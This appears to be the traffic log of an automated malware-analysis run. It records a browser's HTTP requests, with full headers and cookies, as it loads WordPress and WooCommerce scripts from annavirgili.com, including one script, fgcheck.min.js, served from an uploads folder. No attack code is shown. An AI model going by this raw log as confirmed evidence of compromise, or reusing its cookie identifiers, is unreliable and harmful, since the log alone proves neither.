        Source: global trafficHTTP traffic detected: GET /wp-includes/js/jquery/ui/effect-blind.min.js?ver=1.13.3 HTTP/1.1Host: annavirgili.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36sec-ch-ua: "Google Chrome";v="131", "Chromium";v="131", "Not_A Brand";v="24"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://annavirgili.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: cjs_id=6fb43b11-a7c2-4ddc-9b52-231329a2a7bd
        Source: global trafficHTTP traffic detected: GET /wp-content/plugins/contact-form-7/includes/swv/js/index.js?ver=5.9.6 HTTP/1.1Host: annavirgili.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: cjs_id=6fb43b11-a7c2-4ddc-9b52-231329a2a7bd
        Source: global trafficHTTP traffic detected: GET /wp-content/plugins/show-hidecollapse-expand/assets/js/bg-show-hide.js?ver=6.7.1 HTTP/1.1Host: annavirgili.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36sec-ch-ua: "Google Chrome";v="131", "Chromium";v="131", "Not_A Brand";v="24"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://annavirgili.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: cjs_id=6fb43b11-a7c2-4ddc-9b52-231329a2a7bd
        Source: global trafficHTTP traffic detected: GET /wp-content/plugins/contact-form-7/includes/js/index.js?ver=5.9.6 HTTP/1.1Host: annavirgili.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: cjs_id=6fb43b11-a7c2-4ddc-9b52-231329a2a7bd
        Source: global trafficHTTP traffic detected: GET /wp-content/plugins/woocommerce/assets/js/jquery-blockui/jquery.blockUI.min.js?ver=2.7.0-wc.6.6.1 HTTP/1.1Host: annavirgili.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36sec-ch-ua: "Google Chrome";v="131", "Chromium";v="131", "Not_A Brand";v="24"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://annavirgili.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: cjs_id=6fb43b11-a7c2-4ddc-9b52-231329a2a7bd
        Source: global trafficHTTP traffic detected: GET /wp-includes/js/jquery/ui/effect-slide.min.js?ver=1.13.3 HTTP/1.1Host: annavirgili.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: cjs_id=6fb43b11-a7c2-4ddc-9b52-231329a2a7bd
        Source: global trafficHTTP traffic detected: GET /wp-includes/js/jquery/ui/effect.min.js?ver=1.13.3 HTTP/1.1Host: annavirgili.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: cjs_id=6fb43b11-a7c2-4ddc-9b52-231329a2a7bd
        Source: global trafficHTTP traffic detected: GET /wp-content/plugins/woocommerce/assets/js/js-cookie/js.cookie.min.js?ver=2.1.4-wc.6.6.1 HTTP/1.1Host: annavirgili.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36sec-ch-ua: "Google Chrome";v="131", "Chromium";v="131", "Not_A Brand";v="24"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://annavirgili.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: cjs_id=6fb43b11-a7c2-4ddc-9b52-231329a2a7bd
        Source: global trafficHTTP traffic detected: GET /wp-content/plugins/woocommerce/assets/js/frontend/woocommerce.min.js?ver=6.6.1 HTTP/1.1Host: annavirgili.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36sec-ch-ua: "Google Chrome";v="131", "Chromium";v="131", "Not_A Brand";v="24"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://annavirgili.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: cjs_id=6fb43b11-a7c2-4ddc-9b52-231329a2a7bd
        Source: global trafficHTTP traffic detected: GET /wp-content/plugins/woocommerce/assets/js/frontend/cart-fragments.min.js?ver=6.6.1 HTTP/1.1Host: annavirgili.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36sec-ch-ua: "Google Chrome";v="131", "Chromium";v="131", "Not_A Brand";v="24"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://annavirgili.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: cjs_id=6fb43b11-a7c2-4ddc-9b52-231329a2a7bd
        Source: global trafficHTTP traffic detected: GET /wp-includes/js/jquery/ui/effect-highlight.min.js?ver=1.13.3 HTTP/1.1Host: annavirgili.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: cjs_id=6fb43b11-a7c2-4ddc-9b52-231329a2a7bd
        Source: global trafficHTTP traffic detected: GET /wp-includes/js/jquery/ui/effect-fold.min.js?ver=1.13.3 HTTP/1.1Host: annavirgili.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: cjs_id=6fb43b11-a7c2-4ddc-9b52-231329a2a7bd
        Source: global trafficHTTP traffic detected: GET /wp-includes/js/jquery/ui/effect-blind.min.js?ver=1.13.3 HTTP/1.1Host: annavirgili.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: cjs_id=6fb43b11-a7c2-4ddc-9b52-231329a2a7bd; _ga=GA1.1.528636429.1734004707; _ga_2LEWGZ9NK3=GS1.1.1734004706.1.1.1734004706.0.0.0
        Source: global trafficHTTP traffic detected: GET /wp-content/plugins/woo-discount-rules/v2/Assets/Js/site_main.js?ver=2.5.4 HTTP/1.1Host: annavirgili.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36sec-ch-ua: "Google Chrome";v="131", "Chromium";v="131", "Not_A Brand";v="24"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://annavirgili.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: cjs_id=6fb43b11-a7c2-4ddc-9b52-231329a2a7bd; _ga=GA1.1.528636429.1734004707; _ga_2LEWGZ9NK3=GS1.1.1734004706.1.1.1734004706.0.0.0
        Source: global trafficHTTP traffic detected: GET /wp-content/plugins/show-hidecollapse-expand/assets/js/bg-show-hide.js?ver=6.7.1 HTTP/1.1Host: annavirgili.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: cjs_id=6fb43b11-a7c2-4ddc-9b52-231329a2a7bd; _ga=GA1.1.528636429.1734004707; _ga_2LEWGZ9NK3=GS1.1.1734004706.1.1.1734004706.0.0.0
        Source: global trafficHTTP traffic detected: GET /wp-content/plugins/woo-discount-rules/v2/Assets/Js/awdr-dynamic-price.js?ver=2.5.4 HTTP/1.1Host: annavirgili.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36sec-ch-ua: "Google Chrome";v="131", "Chromium";v="131", "Not_A Brand";v="24"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://annavirgili.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: cjs_id=6fb43b11-a7c2-4ddc-9b52-231329a2a7bd; _ga=GA1.1.528636429.1734004707; _ga_2LEWGZ9NK3=GS1.1.1734004706.1.1.1734004706.0.0.0
        Source: global trafficHTTP traffic detected: GET /wp-content/plugins/woocommerce/assets/js/jquery-blockui/jquery.blockUI.min.js?ver=2.7.0-wc.6.6.1 HTTP/1.1Host: annavirgili.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: cjs_id=6fb43b11-a7c2-4ddc-9b52-231329a2a7bd; _ga=GA1.1.528636429.1734004707; _ga_2LEWGZ9NK3=GS1.1.1734004706.1.1.1734004706.0.0.0
        Source: global trafficHTTP traffic detected: GET /wp-content/plugins/woocommerce/assets/js/js-cookie/js.cookie.min.js?ver=2.1.4-wc.6.6.1 HTTP/1.1Host: annavirgili.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: cjs_id=6fb43b11-a7c2-4ddc-9b52-231329a2a7bd; _ga=GA1.1.528636429.1734004707; _ga_2LEWGZ9NK3=GS1.1.1734004706.1.1.1734004706.0.0.0
        Source: global trafficHTTP traffic detected: GET /wp-content/plugins/fami-templatekits/assets/vendors/bootstrap/js/bootstrap.min.js?ver=4.3.1 HTTP/1.1Host: annavirgili.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36sec-ch-ua: "Google Chrome";v="131", "Chromium";v="131", "Not_A Brand";v="24"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://annavirgili.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: cjs_id=6fb43b11-a7c2-4ddc-9b52-231329a2a7bd; _ga=GA1.1.528636429.1734004707; _ga_2LEWGZ9NK3=GS1.1.1734004706.1.1.1734004706.0.0.0
        Source: global trafficHTTP traffic detected: GET /wp-content/uploads/fgcheck.min.js?ver=1.0 HTTP/1.1Host: annavirgili.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36sec-ch-ua: "Google Chrome";v="131", "Chromium";v="131", "Not_A Brand";v="24"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://annavirgili.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: cjs_id=6fb43b11-a7c2-4ddc-9b52-231329a2a7bd; _ga=GA1.1.528636429.1734004707; _ga_2LEWGZ9NK3=GS1.1.1734004706.1.1.1734004706.0.0.0
        Source: global trafficHTTP traffic detected: GET /wp-content/themes/ciena/assets/vendors/perfect-scrollbar/perfect-scrollbar.js?ver=1.5.0 HTTP/1.1Host: annavirgili.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36sec-ch-ua: "Google Chrome";v="131", "Chromium";v="131", "Not_A Brand";v="24"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://annavirgili.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: cjs_id=6fb43b11-a7c2-4ddc-9b52-231329a2a7bd; _ga=GA1.1.528636429.1734004707; _ga_2LEWGZ9NK3=GS1.1.1734004706.1.1.1734004706.0.0.0
        Source: global trafficHTTP traffic detected: GET /wp-content/plugins/woocommerce/assets/js/frontend/woocommerce.min.js?ver=6.6.1 HTTP/1.1Host: annavirgili.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: cjs_id=6fb43b11-a7c2-4ddc-9b52-231329a2a7bd; _ga=GA1.1.528636429.1734004707; _ga_2LEWGZ9NK3=GS1.1.1734004706.1.1.1734004706.0.0.0
        Source: global trafficHTTP traffic detected: GET /wp-content/plugins/woocommerce/assets/js/frontend/cart-fragments.min.js?ver=6.6.1 HTTP/1.1Host: annavirgili.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: cjs_id=6fb43b11-a7c2-4ddc-9b52-231329a2a7bd; _ga=GA1.1.528636429.1734004707; _ga_2LEWGZ9NK3=GS1.1.1734004706.1.1.1734004706.0.0.0
        Source: global trafficHTTP traffic detected: GET /wp-content/plugins/woo-discount-rules/v2/Assets/Js/awdr-dynamic-price.js?ver=2.5.4 HTTP/1.1Host: annavirgili.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: cjs_id=6fb43b11-a7c2-4ddc-9b52-231329a2a7bd; _ga=GA1.1.528636429.1734004707; _ga_2LEWGZ9NK3=GS1.1.1734004706.1.1.1734004706.0.0.0
        Source: global trafficHTTP traffic detected: GET /wp-content/plugins/woo-discount-rules/v2/Assets/Js/site_main.js?ver=2.5.4 HTTP/1.1Host: annavirgili.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: cjs_id=6fb43b11-a7c2-4ddc-9b52-231329a2a7bd; _ga=GA1.1.528636429.1734004707; _ga_2LEWGZ9NK3=GS1.1.1734004706.1.1.1734004706.0.0.0
        Source: global trafficHTTP traffic detected: GET /wp-content/themes/ciena/assets/js/headroom.js?ver=0.11.0 HTTP/1.1Host: annavirgili.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36sec-ch-ua: "Google Chrome";v="131", "Chromium";v="131", "Not_A Brand";v="24"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://annavirgili.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: cjs_id=6fb43b11-a7c2-4ddc-9b52-231329a2a7bd; _ga=GA1.1.528636429.1734004707; _ga_2LEWGZ9NK3=GS1.1.1734004706.1.1.1734004706.0.0.0
        Source: global trafficHTTP traffic detected: GET /wp-content/plugins/woocommerce/assets/js/jquery-cookie/jquery.cookie.min.js?ver=1.4.1-wc.6.6.1 HTTP/1.1Host: annavirgili.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36sec-ch-ua: "Google Chrome";v="131", "Chromium";v="131", "Not_A Brand";v="24"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://annavirgili.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: cjs_id=6fb43b11-a7c2-4ddc-9b52-231329a2a7bd; _ga=GA1.1.528636429.1734004707; _ga_2LEWGZ9NK3=GS1.1.1734004706.1.1.1734004706.0.0.0
        Source: global trafficHTTP traffic detected: GET /wp-content/plugins/elementor/assets/lib/swiper/swiper.min.js?ver=5.3.6 HTTP/1.1Host: annavirgili.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36sec-ch-ua: "Google Chrome";v="131", "Chromium";v="131", "Not_A Brand";v="24"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://annavirgili.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: cjs_id=6fb43b11-a7c2-4ddc-9b52-231329a2a7bd; _ga=GA1.1.528636429.1734004707; _ga_2LEWGZ9NK3=GS1.1.1734004706.1.1.1734004706.0.0.0
        Source: global trafficHTTP traffic detected: GET /wp-content/themes/ciena/assets/vendors/js-offcanvas/js-offcanvas.pkgd.min.js?ver=1.2.9 HTTP/1.1Host: annavirgili.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36sec-ch-ua: "Google Chrome";v="131", "Chromium";v="131", "Not_A Brand";v="24"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://annavirgili.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: cjs_id=6fb43b11-a7c2-4ddc-9b52-231329a2a7bd; _ga=GA1.1.528636429.1734004707; _ga_2LEWGZ9NK3=GS1.1.1734004706.1.1.1734004706.0.0.0
        Source: global trafficHTTP traffic detected: GET /en_US/fbevents.js HTTP/1.1Host: connect.facebook.netConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36sec-ch-ua: "Google Chrome";v="131", "Chromium";v="131", "Not_A Brand";v="24"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://annavirgili.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /wp-content/themes/ciena/assets/js/mega-menu.js?ver=1.0.8 HTTP/1.1Host: annavirgili.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36sec-ch-ua: "Google Chrome";v="131", "Chromium";v="131", "Not_A Brand";v="24"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://annavirgili.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: cjs_id=6fb43b11-a7c2-4ddc-9b52-231329a2a7bd; _ga=GA1.1.528636429.1734004707; _ga_2LEWGZ9NK3=GS1.1.1734004706.1.1.1734004706.0.0.0
        Source: global trafficHTTP traffic detected: GET /wp-content/plugins/woocommerce/assets/js/select2/select2.full.min.js?ver=4.0.3-wc.6.6.1 HTTP/1.1Host: annavirgili.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36sec-ch-ua: "Google Chrome";v="131", "Chromium";v="131", "Not_A Brand";v="24"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://annavirgili.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: cjs_id=6fb43b11-a7c2-4ddc-9b52-231329a2a7bd; _ga=GA1.1.528636429.1734004707; _ga_2LEWGZ9NK3=GS1.1.1734004706.1.1.1734004706.0.0.0
        Source: global trafficHTTP traffic detected: GET /wp-content/uploads/fgcheck.min.js?ver=1.0 HTTP/1.1Host: annavirgili.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: cjs_id=6fb43b11-a7c2-4ddc-9b52-231329a2a7bd; _ga=GA1.1.528636429.1734004707; _ga_2LEWGZ9NK3=GS1.1.1734004706.1.1.1734004706.0.0.0
        Source: global trafficHTTP traffic detected: GET /wp-content/themes/ciena/assets/vendors/perfect-scrollbar/perfect-scrollbar.js?ver=1.5.0 HTTP/1.1Host: annavirgili.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: cjs_id=6fb43b11-a7c2-4ddc-9b52-231329a2a7bd; _ga=GA1.1.528636429.1734004707; _ga_2LEWGZ9NK3=GS1.1.1734004706.1.1.1734004706.0.0.0
        Source: global trafficHTTP traffic detected: GET /wp-content/plugins/fami-templatekits/assets/vendors/bootstrap/js/bootstrap.min.js?ver=4.3.1 HTTP/1.1Host: annavirgili.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: cjs_id=6fb43b11-a7c2-4ddc-9b52-231329a2a7bd; _ga=GA1.1.528636429.1734004707; _ga_2LEWGZ9NK3=GS1.1.1734004706.1.1.1734004706.0.0.0
        Source: global trafficHTTP traffic detected: GET /wp-content/plugins/woocommerce/assets/js/jquery-cookie/jquery.cookie.min.js?ver=1.4.1-wc.6.6.1 HTTP/1.1Host: annavirgili.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: cjs_id=6fb43b11-a7c2-4ddc-9b52-231329a2a7bd; _ga=GA1.1.528636429.1734004707; _ga_2LEWGZ9NK3=GS1.1.1734004706.1.1.1734004706.0.0.0
        Source: global trafficHTTP traffic detected: GET /wp-content/themes/ciena/assets/js/theme.js?ver=1.0.8 HTTP/1.1Host: annavirgili.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36sec-ch-ua: "Google Chrome";v="131", "Chromium";v="131", "Not_A Brand";v="24"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://annavirgili.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: cjs_id=6fb43b11-a7c2-4ddc-9b52-231329a2a7bd; _ga=GA1.1.528636429.1734004707; _ga_2LEWGZ9NK3=GS1.1.1734004706.1.1.1734004706.0.0.0
        Source: global trafficHTTP traffic detected: GET /wp-content/plugins/woocommerce-products-filter/js/ion.range-slider/js/ion.rangeSlider.min.js?ver=3.3.0 HTTP/1.1Host: annavirgili.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36sec-ch-ua: "Google Chrome";v="131", "Chromium";v="131", "Not_A Brand";v="24"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://annavirgili.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: cjs_id=6fb43b11-a7c2-4ddc-9b52-231329a2a7bd; _ga=GA1.1.528636429.1734004707; _ga_2LEWGZ9NK3=GS1.1.1734004706.1.1.1734004706.0.0.0
